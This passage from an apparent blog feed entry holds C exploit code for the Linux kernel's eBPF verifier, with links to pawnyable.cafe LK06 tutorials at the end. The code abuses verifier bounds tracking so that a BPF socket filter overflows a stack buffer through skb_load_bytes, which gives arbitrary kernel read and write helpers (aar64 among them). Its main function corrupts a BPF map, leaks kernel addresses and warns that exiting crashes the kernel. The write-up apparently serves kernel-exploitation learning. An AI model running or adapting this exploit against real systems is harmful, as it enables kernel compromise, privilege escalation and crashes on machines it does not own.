                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Refernece&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
  </channel>
</rss>
